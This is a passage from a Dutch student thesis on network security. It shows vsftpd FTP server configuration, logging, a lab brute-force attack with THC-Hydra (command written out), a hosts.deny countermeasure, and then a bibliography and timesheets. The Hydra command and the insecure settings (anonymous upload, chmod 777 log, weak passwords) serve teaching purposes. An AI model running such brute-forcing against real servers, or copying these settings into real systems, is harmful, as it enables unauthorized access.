
will

# obviously need to create a directory writable by the FTP user.

anon_upload_enable=YES

#

# Uncomment this if you want the anonymous FTP user to be able to create

# new directories.

anon_mkdir_write_enable=YES

...

Hier schakelen we in dat de anonieme gebruikers bestanden kan uploaden en directories kan maken.

Page 129: Hogeschool-Universiteit Brussel · 2014-02-05 · Voorwoord. Als student Toegepaste Informatica aan de Hogeschool Universiteit Brussel interesseer ik me voor het onderdeel computernetwerken,

129

3. Logging inschakelen

Om logging in te schakelen stellen we de vsftpd configuratiefile als volgt in:

...

# Activate logging of uploads/downloads.

xferlog_enable=YES

...

# You may override where the log file goes if you like. The default is

shown

# below.

xferlog_file=/var/log/vsftpd.log

...

Dit is nog niet genoeg, vermits de file /var/log/vsftpd.log nog niet aangemaakt is en de nodige

rechten heeft gekregen. We maken het bestand aan met touch /var/log/vsftpd.log en

vervolgens passen we de bevoegdheden aan met chmod 777. Dit laatste zorgt ervoor dat elke

gebruiker op het bestand kan schrijven en lezen.

Page 130: Hogeschool-Universiteit Brussel · 2014-02-05 · Voorwoord. Als student Toegepaste Informatica aan de Hogeschool Universiteit Brussel interesseer ik me voor het onderdeel computernetwerken,

130

Als test loggen we anoniem in op de FTP server, eenmaal lokaal en de andere keer op een host.

Met cat bekijken we de inhoud van een file.

De eerste regel van de logfile laat zien dat er een client met IP-adres 192.168.0.212 heeft kunnen

verbinden met de server. De regel daaronder geeft weer dat er met anonieme logingegevens is

gewerkt. De derde regel zegt ons dat er in de folder /opendir/ een bestand is gedownload,

namelijk TEST123.txt.

Daaronder gebeurt hetzelfde, maar dan in de default folder en het bestand 0123Test.txt.

Tevens kunnen we hier zien dat er lokaal is gewerkt, omdat 127.0.0.1 het adres van de localhost is.

Dit is m.a.w. het adres van de FTP server.

Page 131: Hogeschool-Universiteit Brussel · 2014-02-05 · Voorwoord. Als student Toegepaste Informatica aan de Hogeschool Universiteit Brussel interesseer ik me voor het onderdeel computernetwerken,

131

4. Server proberen kraken

Anonieme toegang hoeft helemaal niet gekraakt te worden. Het enige wat moet verkregen worden is

het IP-adres van de FTP server zodat er kan mee geconnecteerd worden. Door footprinting en

scanning toe te passen zou dit geen probleem mogen zijn.

Als er een goede DMZ ingesteld is en de FTP server enkel lokaal gebruikt zal worden, dan hoeft hier

geen extra beveiliging toegepast te worden.

5. Conclusies trekken

Pluspunt: Iedereen kan aan de bestanden op de server.

Minpunt: Iedereen kan aan de bestanden op de server.

6. Anonieme toegang uitschakelen, configuratie aanpassen en accounts aanmaken

Anonieme toegang uitschakelen is even terugkijken naar wat er eerder geconfigureerd is geweest en

dit ongedaan maken

...

# Allow anonymous FTP? (Disabled by default)

anonymous_enable=NO

...

# Uncomment this to allow local users to log in.

local_enable=YES

...

Nog een veiligheidstip is om de tijd aan te passen wanneer een sessie waarop ingelogd is te doen

verstrijken.

...

#You may change the default value for timing out an idle session.

idle_session_timeout=600

#

# You may change the default value for timing out a data connection.

data_connection_timeout=120

...

Hieronder specificiëren we de RSA certificaten en sleutel dat we gebruiken voor SSL, dat connecties

zal encrypteren zodat wachtwoorden niet zo makkelijk kunnen worden afgeluisterd.

# This option specifies the location of the RSA certificate to use for SSL

# encrypted connections.

rsa_cert_file=/etc/ssl/certs/ssl-cert-snakeoil.pem

# This option specifies the location of the RSA key to use for SSL

# encrypted connections.

rsa_private_key_file=/etc/ssl/private/ssl-cert-snakeoil.key

Nu we de veiligheid een beetje achter handen hebben maken we de verschillende accounts aan.

Page 132: Hogeschool-Universiteit Brussel · 2014-02-05 · Voorwoord. Als student Toegepaste Informatica aan de Hogeschool Universiteit Brussel interesseer ik me voor het onderdeel computernetwerken,

132

We gebruiken hiervoor deze template:

Gebruikersnaam Wachtwoord

User001 X1234a

User002 X1235b

User003 X1236c

User004 X1237d

User005 X1238e

User006 X1239f

User007 azerty

User008 azerty

User009 azerty

User010 azerty

Gebruikers aanmaken doet men met het commando useradd, waarna een wachtwoord kan ingesteld

worden met eventuele persoonlijke informatie. Hieronder een voorbeeld:

Page 133: Hogeschool-Universiteit Brussel · 2014-02-05 · Voorwoord. Als student Toegepaste Informatica aan de Hogeschool Universiteit Brussel interesseer ik me voor het onderdeel computernetwerken,

133

Even controleren of alle gebruikers aangemaakt zijn:

De volgende stap is de configuratiefile weer aanpassen om een lijst van lokale gebruikers te

gebruiken als gebruikers voor de FTP server. Dit zijn de variabelen die we moeten aanpassen:

...

chroot_list_enable=YES

allow_writeable_chroot=YES

...

Deze twee variabelen zorgen ervoor dat de FTP server een lijst van lokale gebruikers zal hanteren om

de login's te regelen. De locatie van deze lijst is /etc/vsftpd.chroot_list. Hier hoeven er enkel

de gebruikersnamen te staan van degenen die mogen inloggen. Wachtwoorden zijn hetzelfde als de

lokale varianten.

We verwijderen alle logs die we tot nu toe hebben gemaakt en we kijken wat er gebeurt als we

proberen inloggen.

De poging is succesvol.

Nu proberen we anoniem in te loggen door geen gebruikersnaam en wachtwoord in te geven.

Het anoniem inloggen lukt niet meer.

7. Server proberen kraken

Een manier om op de FTP server te geraken, ook al is anonieme login uitgeschakeld, is om te brute-

forcen. We gaan in deze case ervan uit dat de aanvaller is kunnen binnendringen in het hoofdgebouw

Page 134: Hogeschool-Universiteit Brussel · 2014-02-05 · Voorwoord. Als student Toegepaste Informatica aan de Hogeschool Universiteit Brussel interesseer ik me voor het onderdeel computernetwerken,

134

van het bedrijf en enkele foto's heeft kunnen nemen van nota's die op het bureau van de

netwerkadministrator lagen.

Na het installeren van THC-Hydra passen we de brute-forcing toe. Dit is wat we tot nu toe weten:

Het IP-adres van de FTP server is 192.168.0.121

Gebruikersnamen gaan van "user001" tot "user010"

Wachtwoorden variëren van "X1234a" tot "azerty"

Met deze informatie gaan we een stapje verder en proberen we binnen te geraken.

Met het commando ./hydra host_address ftp -L gebruikers.txt -P

wachtwoorden.txt kan het brute-forcen beginnen. De data staat in de juiste documenten en het

aangepaste commando luidt als volgt:

./hydra 192.168.0.121 ftp -L /home/adminuser/Desktop/gebruikers -P

/home/adminuser/Desktop/wachtwoorden

Page 135: Hogeschool-Universiteit Brussel · 2014-02-05 · Voorwoord. Als student Toegepaste Informatica aan de Hogeschool Universiteit Brussel interesseer ik me voor het onderdeel computernetwerken,

135

We zijn binnen.

Wat ziet de netwerkbeheerder nu aan zijn kant? We bekijken voor een laatste maal de logging.

Hier klopt iets niet

Eenmaal de netwerkbeheerder door heeft wat er aan de hand is kunnen er maatregelen getroffen

worden. Het weigeren van een connectie door een bepaald IP-adres bijvoorbeeld. Dit gaan we als

voorbeeld manueel doen, maar hier kunnen scripts voor geschreven worden.

Page 136: Hogeschool-Universiteit Brussel · 2014-02-05 · Voorwoord. Als student Toegepaste Informatica aan de Hogeschool Universiteit Brussel interesseer ik me voor het onderdeel computernetwerken,

136

Door in /etc/hosts.deny een nieuwe regel toe te voegen kunnen we de toegang van de aanvaller

stopzetten. Dit is de nieuwe regel dat zal toegevoegd worden:

vsftpd : 192.168.0.212

We kijken of dit iets heeft uitgeholpen aan de pogingen van de aanvaller:

De hacker kan niet meer inloggen.

5 Conclusie De hacker is binnengeraakt door brute-forcing toe te passen, met informatie die hij verkregen heeft

door slimme Footprinting toe te passen. De lessen die hier kunnen uit geleerd worden is om nooit

wachtwoorden op te schrijven, zelfs niet als de gebruikersnaam ontbreekt.

Het configureren van een FTP server brengt met zich mee dat er steeds aan gevaren van buitenaf

moet gedacht worden vooraleer de server online komt te staan. De schade in het voorbeeld is reeds

gedaan, de hacker weet welke gebruikersnamen werken en welke wachtwoorden er gebruikt

worden. Een simpele verandering van zijn IP-adres doet genoeg om verder te gaan met het

infiltreren.

Page 137: Hogeschool-Universiteit Brussel · 2014-02-05 · Voorwoord. Als student Toegepaste Informatica aan de Hogeschool Universiteit Brussel interesseer ik me voor het onderdeel computernetwerken,

137

Bibliografie 1 Websites http://www.watchguard.com/infocenter/editorial/135324.asp

http://www.watchguard.com/archive/files/images/ARPpoison3.jpg

http://www.cisco.com/en/US/docs/switches/lan/catalyst3550/software/release/12.2_25_see/config

uration/guide/swdynarp.html

http://www.diffen.com/difference/TCP_vs_UDP

http://www.plixer.com/blog/scrutinizer/the-null-scan-you%E2%80%99re-being-watched/

http://www.networkuptime.com/nmap/page3-13.shtml

http://www.networkuptime.com/nmap/page3-14.shtml

http://nmap.org/book/man-port-scanning-techniques.html

http://wiki.dreamhost.com/Troubleshooting_Hacked_Sites#Looking_world-writable_directories

http://en.wikipedia.org/wiki/Honeypot_%28computing%29

https://sc1.checkpoint.com/documents/R77/CP_R77_VPN_AdminGuide/13847.htm

https://supportforums.cisco.com/docs/DOC-8125,

http://en.wikipedia.org/wiki/IPsec#Security_association

http://en.wikipedia.org/wiki/Internet_Security_Association_and_Key_Management_Protocol,

http://cisco-vpn.org.ua/1587051044/ch08lev1sec1.html

http://nl.wikipedia.org/wiki/Diffie-Hellman-sleuteluitwisselingsprotocol

http://compnetworking.about.com/cs/wireless80211/a/aa80211standard.htmFrequenties

https://discussions.apple.com/thread/2632171,

http://compnetworking.about.com/cs/wireless80211/a/aa80211standard.htm

http://en.wikipedia.org/wiki/IEEE_802.11i-2004

http://www.watchguard.com/infocenter/editorial/135324.asp

http://www.watchguard.com/archive/files/images/ARPpoison3.jpg

http://www.cisco.com/en/US/docs/switches/lan/catalyst3550/software/release/12.2_25_see/config

uration/guide/swdynarp.html

2 Boeken Keith Barker en Scott Morris. (2013). CCNA Security 640-554 Official Cert Guide.

Stuart McClure, Joel Scrambray, George Kurtz. (2012). Hacking Exposed 7

Page 138: Hogeschool-Universiteit Brussel · 2014-02-05 · Voorwoord. Als student Toegepaste Informatica aan de Hogeschool Universiteit Brussel interesseer ik me voor het onderdeel computernetwerken,

138

Timesheets 1 Tijdstabel Hacking Exposed

Tijdstabel Hacking Exposed

Tijbesteding Plaats Dag Beginuur Einduur Gespendeerde uren Totaal uren

Uitleg gekregen over bachlorproef en wat er van ons verwacht wordt

Klas 23/sep 16.00 u. 18.00 u. 2.00 u. 2.00 u.

Uitleg gekregen over bachlorproef en wat er van ons verwacht wordt

Klas 24/sep 14.00 u. 16.00 u. 2.00 u. 4.00 u.

Lijst van mogelijke prover overlopen. Overzicht maken van proeven waar ik in geïntresseerd ben en hier 3 plaatsen uitkiezen

Klas 25/sep 14.00 u. 18.00 u. 4.00 u. 8.00 u.

De 3 uitgekozen plaatsen contacteren Klas 27/sep 14.00 u. 18.00 u. 4.00 u. 12.00 u.

Beginnen aan de PID Klas 30/sep 16.00 u. 18.00 u. 2.00 u. 14.00 u.

Presentatie en tekst opstellen Klas 2/okt 14.00 u. 18.00 u. 4.00 u. 18.00 u.

Verdere uitleg gekregen over PID en eindwerk Klas 3/okt 14.00 u. 16.00 u. 2.00 u. 20.00 u.

Presentatie geven over de gekozen bachlorproef Klas 4/okt 14.00 u. 18.00 u. 4.00 u. 24.00 u.

Dualboot geconfigureerd op laptop Thuis 5/okt 17.00 u. 23.00 u. 6.00 u. 30.00 u.

Geëxperimenteerd met Backtrack 5 r3 Thuis 6/okt 14.00 u. 18.00 u. 4.00 u. 34.00 u.

Afspraak met iMinds Klas 7/okt 16.00 u. 18.00 u. 2.00 u. 36.00 u.

Boek Hacking Exposed 7 lezen Klas 8/okt 14.00 u. 16.00 u. 2.00 u. 38.00 u.

Werken aan PID Klas 9/okt 14.00 u. 18.00 u. 4.00 u. 42.00 u.

Werken aan PID Klas 10/okt 14.00 u. 16.00 u. 2.00 u. 44.00 u.

Page 139: Hogeschool-Universiteit Brussel · 2014-02-05 · Voorwoord. Als student Toegepaste Informatica aan de Hogeschool Universiteit Brussel interesseer ik me voor het onderdeel computernetwerken,

139

Document opstellen met 10 mogelijke manier om te hacken, een korte beschrijving en een oplossing om dit tegen te gaan

Klas 11/okt 14.00 u. 18.00 u. 4.00 u. 48.00 u.

Werken aan PID Klas 16/okt 14.00 u. 18.00 u. 4.00 u. 52.00 u.

Lezen in boek Hacking Exposed 7: H1 Footprinting Klas 17/okt 14.00 u. 16.00 u. 2.00 u. 54.00 u.

Lezen in boek Hacking Exposed 7: H1 Footprinting Klas 18/okt 14.00 u. 18.00 u. 4.00 u. 58.00 u.

Lezen in boek Hacking Exposed 7: H1 Footprinting Klas 21/okt 16.00 u. 18.00 u. 2.00 u. 60.00 u.

Lezen in boek Hacking Exposed 7: H2 Scanning Klas 22/okt 14.00 u. 16.00 u. 2.00 u. 62.00 u.

Lezen in boek Hacking Exposed 7: H2 Scanning Klas 23/okt 14.00 u. 18.00 u. 4.00 u. 66.00 u.

Lezen in boek Hacking Exposed 7: H2 Scanning Klas 24/okt 14.00 u. 16.00 u. 2.00 u. 68.00 u.

Deliverable Stap 1 maken op een kladblad Klas 25/okt 14.00 u. 18.00 u. 4.00 u. 72.00 u.

Lezen in boek Hacking Exposed 7: H2 Scanning Klas 6/nov 14.00 u. 18.00 u. 4.00 u. 76.00 u.

Deliverable Footprinting Stap 1 Klas 7/nov 14.00 u. 16.00 u. 2.00 u. 78.00 u.

Deliverable Footprinting Stap 1 Thuis 8/nov 11.00 u. 12.00 u. 1.00 u. 79.00 u.

Deliverable Footprinting Stap 1 Thuis 8/nov 14.00 u. 16.00 u. 2.00 u. 81.00 u.

Deliverable Footprinting Stap 1 Thuis 8/nov 19.00 u. 20.00 u. 1.00 u. 82.00 u.

Deliverable Footprinting Stap 1 Thuis 11/nov 16.00 u. 18.00 u. 2.00 u. 84.00 u.

Lezen in boek Hacking Exposed 7: H3 Enumeration Thuis 12/nov 14.00 u. 16.00 u. 2.00 u. 86.00 u.

Superhackaton Voorbereiding School 14/nov 9.00 u. 18.00 u. 9.00 u. 95.00 u.

Superhackaton Monitoring School 15/nov 7.30 u. 21.00 u. 13.30 u. 108.30 u.

Zoeken naar tijdstabel want tijdstabel verloren Thuis 18/nov 14.00 u. 17.00 u. 3.00 u. 111.30 u.

Deliverable Footprinting Stap 1 Thuis 19/nov 17.00 u. 18.00 u. 1.00 u. 112.30 u.

Deliverable Footprinting Stap 1 School 20/nov 14.00 u. 18.00 u. 4.00 u. 116.30 u.

Lezen in boek Hacking Exposed 7: H3 Enumeration Trein 21/nov 10.00 u. 10.50 u. 0.50 u. 117.20 u.

Deliverable Footprinting Stap 1 afgewerkt Thuis 23/nov 14.00 u. 16.00 u. 2.00 u. 119.20 u.

Nalezen Deliverable Footprinting Stap 1 Thuis 24/nov 20.00 u. 21.00 u. 1.00 u. 120.20 u.

Deliverable Scanning Stap 2 Thuis 25/nov 13.00 u. 14.30 u. 1.30 u. 121.50 u.

Deliverable Scanning Stap 2 School 25/nov 16.00 u. 18.00 u. 2.00 u. 123.50 u.

Deliverable Scanning Stap 2 Thuis 25/nov 20.00 u. 22.00 u. 2.00 u. 125.50 u.

Page 140: Hogeschool-Universiteit Brussel · 2014-02-05 · Voorwoord. Als student Toegepaste Informatica aan de Hogeschool Universiteit Brussel interesseer ik me voor het onderdeel computernetwerken,

140

Deliverable Scanning Stap 2 Thuis 26/nov 20.00 u. 22.30 u. 2.30 u. 128.20 u.

Deliverable Scanning Stap 2 School 27/nov 13.50 u. 15.40 u. 1.50 u. 130.10 u.

Lezen in boek Hacking Exposed 7: H3 Enumeration School 28/nov 8.00 u. 8.40 u. 0.40 u. 130.50 u.

Deliverable Scanning Stap 2 School 28/nov 14.00 u. 16.00 u. 2.00 u. 132.50 u.

Nalezen Deliverable Footprinting Stap 1 Thuis 29/nov 9.30 u. 11.30 u. 2.00 u. 134.50 u.

Lezen in boek Hacking Exposed 7: H3 Enumeration Trein 29/nov 13.00 u. 13.30 u. 0.30 u. 135.20 u.

Deliverable Scanning Stap 2 School 29/nov 14.10 u. 14.40 u. 0.30 u. 135.50 u.

Gekozen welke cases we zullen uitwerken School 6/dec 14.40 u. 15.30 u. 0.50 u. 136.40 u.

Case 1: Scanning en IOS IPS opstellen School 18/dec 14.00 u. 17.30 u. 3.30 u. 140.10 u.

Case 3: Afluisteren van netwerkverkeer, telnet afluisteren

School 18/dec 17.30 u. 18.10 u. 0.40 u. 140.50 u.

Case 1: Scanning en IOS IPS opstellen School 19/dec 14.00 u. 18.10 u. 4.10 u. 145.00 u.

Case 3: Afluisteren van netwerkverkeer, telnet afluisteren

School 20/dec 10.00 u. 12.30 u. 2.30 u. 147.30 u.

Case 3: Afluisteren van netwerkverkeer, telnet afluisteren

School 20/dec 14.00 u. 17.20 u. 3.20 u. 150.50 u.

Deliverable Scanning Stap 2 Thuis 22/dec 14.00 u. 16.20 u. 2.20 u. 153.10 u.

Deliverable Scanning Stap 2 Thuis 22/dec 17.00 u. 18.10 u. 1.10 u. 154.20 u.

Deliverable Scanning Stap 2 Thuis 23/dec 11.00 u. 12.30 u. 1.30 u. 155.50 u.

Deliverable Scanning Stap 2 Thuis 23/dec 14.00 u. 18.00 u. 4.00 u. 159.50 u.

Deliverable Scanning Stap 2 Thuis 23/dec 19.10 u. 22.20 u. 3.10 u. 163.00 u.

Deliverable Scanning Stap 2 Thuis 24/dec 10.10 u. 12.30 u. 2.20 u. 165.20 u.

Deliverable Scanning Stap 2 Thuis 24/dec 13.40 u. 15.30 u. 1.50 u. 167.10 u.

Lezen in boek Hacking Exposed 7: H3 Enumeration Thuis 26/dec 10.00 u. 12.00 u. 2.00 u. 169.10 u.

Lezen in boek Hacking Exposed 7: H3 Enumeration Thuis 27/dec 14.00 u. 15.20 u. 1.20 u. 170.30 u.

Lezen in boek Hacking Exposed 7: H3 Enumeration Thuis 27/dec 16.00 u. 17.10 u. 1.10 u. 171.40 u.

Lezen in boek Hacking Exposed 7: H5 Hacking Unix Thuis 28/dec 10.20 u. 11.40 u. 1.20 u. 173.00 u.

Lezen in boek Hacking Exposed 7: H5 Hacking Unix Thuis 28/dec 14.50 u. 16.30 u. 1.40 u. 174.40 u.

Page 141: Hogeschool-Universiteit Brussel · 2014-02-05 · Voorwoord. Als student Toegepaste Informatica aan de Hogeschool Universiteit Brussel interesseer ik me voor het onderdeel computernetwerken,

141

Lezen in boek Hacking Exposed 7: H7 Remote Connectivity and VoIP Hacking

Thuis 29/dec 11.10 u. 12.30 u. 1.20 u. 176.00 u.

Lezen in boek Hacking Exposed 7: H7 Remote Connectivity and VoIP Hacking

Thuis 29/dec 14.40 u. 16.30 u. 1.50 u. 177.50 u.

Lezen in boek Hacking Exposed 7: H8 Wireless Hacking

Thuis 30/dec 10.30 u. 12.20 u. 1.50 u. 179.40 u.

Lezen in boek Hacking Exposed 7: H8 Wireless Hacking

Thuis 30/dec 16.00 u. 17.50 u. 1.50 u. 181.30 u.

Deliverable Enumeration Stap 3 Thuis 2/jan 14.00 u. 16.00 u. 2.00 u. 183.30 u.

Deliverable Enumeration Stap 3 Thuis 2/jan 17.00 u. 19.40 u. 2.40 u. 186.10 u.

Deliverable Enumeration Stap 3 Thuis 2/jan 20.00 u. 21.40 u. 1.40 u. 187.50 u.

Deliverable Enumeration Stap 3 Thuis 3/jan 9.20 u. 11.40 u. 2.20 u. 190.10 u.

Deliverable Enumeration Stap 3 Thuis 3/jan 11.50 u. 12.30 u. 0.40 u. 190.50 u.

Deliverable Enumeration Stap 3 Thuis 3/jan 14.00 u. 15.30 u. 1.30 u. 192.20 u.

Deliverable Hacking Unix Stap 4 Thuis 3/jan 15.10 u. 16.30 u. 1.20 u. 193.40 u.

Deliverable Hacking Unix Stap 4 Thuis 4/jan 9.30 u. 11.20 u. 1.50 u. 195.30 u.

Deliverable Hacking Unix Stap 4 Thuis 4/jan 13.00 u. 14.20 u. 1.20 u. 196.50 u.

Deliverable Hacking Unix Stap 4 Thuis 4/jan 14.40 u. 15.30 u. 0.50 u. 197.40 u.

Deliverable Hacking Unix Stap 4 Thuis 4/jan 16.00 u. 17.20 u. 1.20 u. 199.00 u.

Deliverable Hacking Unix Stap 4 Thuis 4/jan 18.00 u. 19.40 u. 1.40 u. 200.40 u.

Deliverable Remote Connectivity Stap 5 Thuis 5/jan 9.50 u. 10.40 u. 0.50 u. 201.30 u.

Deliverable Remote Connectivity Stap 5 Thuis 5/jan 11.00 u. 12.40 u. 1.40 u. 203.10 u.

Deliverable Remote Connectivity Stap 5 Thuis 5/jan 14.10 u. 16.20 u. 2.10 u. 205.20 u.

Deliverable Remote Connectivity Stap 5 Thuis 6/jan 11.30 u. 12.40 u. 1.10 u. 206.30 u.

Deliverable Remote Connectivity Stap 5 Thuis 6/jan 15.00 u. 16.50 u. 1.50 u. 208.20 u.

Deliverable Remote Connectivity Stap 5 Thuis 6/jan 17.20 u. 18.30 u. 1.10 u. 209.30 u.

Deliverable Remote Connectivity Stap 5 Thuis 7/jan 9.30 u. 11.40 u. 2.10 u. 211.40 u.

Deliverable Wireless Hacking Stap 6 Thuis 7/jan 13.00 u. 14.10 u. 1.10 u. 212.50 u.

Deliverable Wireless Hacking Stap 6 Thuis 7/jan 15.00 u. 16.20 u. 1.20 u. 214.10 u.

Page 142: Hogeschool-Universiteit Brussel · 2014-02-05 · Voorwoord. Als student Toegepaste Informatica aan de Hogeschool Universiteit Brussel interesseer ik me voor het onderdeel computernetwerken,

142

Deliverable Wireless Hacking Stap 6 Thuis 7/jan 16.30 u. 17.50 u. 1.20 u. 215.30 u.

Deliverable Wireless Hacking Stap 6 Thuis 7/jan 19.00 u. 21.40 u. 2.40 u. 218.10 u.

Deliverable Wireless Hacking Stap 6 Thuis 8/jan 14.20 u. 16.40 u. 2.20 u. 220.30 u.

Deliverable Wireless Hacking Stap 6 Thuis 8/jan 17.00 u. 18.30 u. 1.30 u. 222.00 u.

Deliverable Wireless Hacking Stap 6 Thuis 8/jan 19.20 u. 21.40 u. 2.20 u. 224.20 u.

Case 3: Afluisteren van netwerkverkeer, telnet afluisteren documenteren

Thuis 9/jan 9.30 u. 11.40 u. 2.10 u. 226.30 u.

Case 3: Afluisteren van netwerkverkeer, telnet afluisteren documenteren

Thuis 9/jan 13.20 u. 14.30 u. 1.10 u. 227.40 u.

Case 3: Afluisteren van netwerkverkeer, telnet afluisteren documenteren

Thuis 9/jan 15.00 u. 16.40 u. 1.40 u. 229.20 u.

Case 3: Afluisteren van netwerkverkeer, telnet afluisteren documenteren

Thuis 9/jan 17.10 u. 18.00 u. 0.50 u. 230.10 u.

Case 3: Afluisteren van netwerkverkeer, telnet afluisteren documenteren

Thuis 9/jan 19.10 u. 21.30 u. 2.20 u. 232.30 u.

Werken aan hoofdtekst Thuis 10/jan 9.10 u. 10.40 u. 1.30 u. 234.00 u.

Werken aan hoofdtekst Thuis 10/jan 11.00 u. 12.50 u. 1.50 u. 235.50 u.

Nalezen Deliverable Scanning Stap 2 Thuis 10/jan 14.00 u. 15.40 u. 1.40 u. 237.30 u.

Nalezen Deliverable Scanning Stap 2 Thuis 10/jan 16.00 u. 17.20 u. 1.20 u. 238.50 u.

Nalezen Deliverable Scanning Stap 2 Thuis 10/jan 18.00 u. 19.50 u. 1.50 u. 240.40 u.

Nalezen Deliverable Enumeration Stap 3 Thuis 11/jan 10.20 u. 11.50 u. 1.30 u. 242.10 u.

Nalezen Deliverable Enumeration Stap 3 Thuis 11/jan 13.00 u. 14.50 u. 1.50 u. 244.00 u.

Nalezen Deliverable Enumeration Stap3 Thuis 11/jan 15.00 u. 16.20 u. 1.20 u. 245.20 u.

Nalezen Deliverable Hacking Unix Stap 4 Thuis 11/jan 16.40 u. 17.50 u. 1.10 u. 246.30 u.

Nalezen Deliverable Hacking Unix Stap 4 Thuis 11/jan 18.30 u. 20.20 u. 1.50 u. 248.20 u.

Nalezen Deliverable Hacking Unix Stap 4 Thuis 11/jan 20.40 u. 21.50 u. 1.10 u. 249.30 u.

Nalezen Deliverable Remote Connectivity Stap 5 Thuis 12/jan 9.10 u. 10.40 u. 1.30 u. 251.00 u.

Nalezen Deliverable Remote Connectivity Stap 5 Thuis 12/jan 11.00 u. 13.10 u. 2.10 u. 253.10 u.

Nalezen Deliverable Remote Connectivity Stap 5 Thuis 12/jan 15.00 u. 17.20 u. 2.20 u. 255.30 u.

Page 143: Hogeschool-Universiteit Brussel · 2014-02-05 · Voorwoord. Als student Toegepaste Informatica aan de Hogeschool Universiteit Brussel interesseer ik me voor het onderdeel computernetwerken,

143

Nalezen Deliverable Remote Connectivity Stap 5 Thuis 12/jan 17.30 u. 17.50 u. 0.20 u. 255.50 u.

Nalezen Deliverable Remote Connectivity Stap 5 Thuis 12/jan 18.30 u. 20.10 u. 1.40 u. 257.30 u.

Nalezen Deliverable Wireless Hacking Stap 6 Thuis 13/jan 9.30 u. 10.40 u. 1.10 u. 258.40 u.

Nalezen Deliverable Wireless Hacking Stap 6 Thuis 13/jan 11.00 u. 12.40 u. 1.40 u. 260.20 u.

Nalezen Deliverable Wireless Hacking Stap 6 Thuis 13/jan 14.10 u. 16.40 u. 2.30 u. 262.50 u.

Nalezen Deliverable Wireless Hacking Stap 6 Thuis 13/jan 17.00 u. 18.10 u. 1.10 u. 264.00 u.

Werken aan Hoofdtekst Thuis 14/jan 9.40 u. 12.10 u. 2.30 u. 266.30 u.

Werken aan Hoofdtekst Thuis 14/jan 14.10 u. 16.20 u. 2.10 u. 268.40 u.

Nalezen van Hoofdteskt Thuis 14/jan 17.00 u. 18.30 u. 1.30 u. 270.10 u.

Nalezen van Hoofdteskt Thuis 14/jan 19.00 u. 20.40 u. 1.40 u. 271.50 u.

Case 1: Scanning en IOS IPS documenteren Thuis 16/jan 10.20 u. 12.40 u. 2.20 u. 274.10 u.

Case 1: Scanning en IOS IPS documenteren Thuis 16/jan 13.30 u. 15.40 u. 2.10 u. 276.20 u.

Case 1: Scanning en IOS IPS documenteren Thuis 16/jan 16.00 u. 17.30 u. 1.30 u. 277.50 u.

Case 1: Scanning en IOS IPS documenteren Thuis 17/jan 10.20 u. 13.00 u. 2.40 u. 280.30 u.

Case 1: Scanning en IOS IPS documenteren Thuis 17/jan 14.10 u. 16.30 u. 2.20 u. 282.50 u.

Aan de presentatie werken Thuis 20/jan 14.10 u. 18.10 u. 4.00 u. 286.50 u.

Alles in een document plaatsen Thuis 20/jan 19.00 u. 22.10 u. 3.10 u. 290.00 u.

Alles in een document plaatsen Thuis 21/jan 9.10 u. 11.30 u. 2.20 u. 292.20 u.

Bijkomende zaken maken, onderandere bibliografie, inhoudstafel, enz …

Thuis 21/jan 12.10 u. 18.30 u. 6.20 u. 298.40 u.

Bijkomende zaken maken, onderandere bibliografie, inhoudstafel, enz …

Thuis 21/jan 19.00 u. 21.00 u. 2.00 u. 300.40 u.

Omzetten naar PDF formaat Thuis 22/jan 9.20 u. 10.10 u. 0.50 u. 301.30 u.

Laten afprinten Halle 22/jan 16.00 u. 17.20 u. 1.20 u. 302.50 u.

Totaal aantal gespendeerde uren: 302.50 u.

2 Tijdstabel Netwerk Security Tijdstabel Nathan Boone

Tijbesteding Plaats Dag Beginuur Einduur Gespendeerde uren Totaal uren

Page 144: Hogeschool-Universiteit Brussel · 2014-02-05 · Voorwoord. Als student Toegepaste Informatica aan de Hogeschool Universiteit Brussel interesseer ik me voor het onderdeel computernetwerken,

144

Uitleg gekregen over Cisco Configuration Professional (CCP)

School 2/okt 18.00 u. 20.00 u. 2.00 u. 2.00 u.

CCP uitgeprobeert maar mislukt School 3/okt 18.00 u. 20.00 u. 2.00 u. 4.00 u.

CCP geconfigureert en gelukt School 9/okt 18.00 u. 20.00 u. 2.00 u. 6.00 u.

Uitleg gekregen over IPv6 School 10/okt 18.00 u. 19.15 u. 1.15 u. 7.15 u.

Portfolio Netwerksecurity: CCP Thuis 11/okt 10.00 u. 11.30 u. 1.30 u. 8.45 u.

Portfolio Netwerksecurity: Lab2 Researching Network Attacks and Security Audit Tools

School 11/okt 14.00 u. 15.00 u. 1.00 u. 9.45 u.

Portfolio Netwerksecurity: Lab2 Researching Network Attacks and Security Audit Tools

School 14/okt 18.00 u. 19.15 u. 1.15 u. 11.00 u.

Portfolio Netwerksecurity: Lab2 Researching Network Attacks and Security Audit Tools

School 16/okt 18.00 u. 19.15 u. 1.15 u. 12.15 u.

Portfolio Netwerksecurity: Chapter 3 lab A: Securing Administratice Access Using AAA and Radius

Thuis 17/okt 20.00 u. 22.00 u. 2.00 u. 14.15 u.

Uitleg gekregen over verschillende VPN's en een site to site VPN ingesteld met Menr Rooseleer

School 23/okt 18.00 u. 20.00 u. 2.00 u. 16.15 u.

Uitleg gekregen over verschillende soorten Firewall's

School 24/okt 18.00 u. 19.15 u. 1.15 u. 17.30 u.

Maken van labo: Chapter 3 lab A: Securing Administratice Access Using AAA and Radius

School 6/nov 18.00 u. 19.15 u. 1.15 u. 18.45 u.

Portfolio Netwerksecurity: Chapter 3 lab A: Securing Administratice Access Using AAA and Radius

Thuis 7/nov 10.00 u. 11.00 u. 1.00 u. 19.45 u.

Maken van labo: Chapter 3 lab A: Securing Administratice Access Using AAA and Radius

School 7/nov 18.00 u. 20.25 u. 2.25 u. 22.10 u.

Page 145: Hogeschool-Universiteit Brussel · 2014-02-05 · Voorwoord. Als student Toegepaste Informatica aan de Hogeschool Universiteit Brussel interesseer ik me voor het onderdeel computernetwerken,

145

Portfolio Netwerksecurity: Chapter 3 lab A: Securing Administratice Access Using AAA and Radius

Thuis 7/nov 21.45 u. 22.30 u. 0.45 u. 22.55 u.

Maken van labo: Chapter 3 lab A: Securing Administratice Access Using AAA and Radius

School 13/nov 18.00 u. 19.15 u. 1.15 u. 24.10 u.

Maken van labo: Chapter 4 lab A: CBA and Zone Based Firewall

School 20/nov 18.00 u. 19.15 u. 1.15 u. 25.25 u.

Maken van labo: Chapter 4 lab A: CBA and Zone Based Firewall

School 21/nov 11.00 u. 13.00 u. 2.00 u. 27.25 u.

Portfolio Netwerksecurity: Chapter 3 lab A: Securing Administratice Access Using AAA and Radius

School 21/nov 18.00 u. 20.15 u. 2.15 u. 29.40 u.

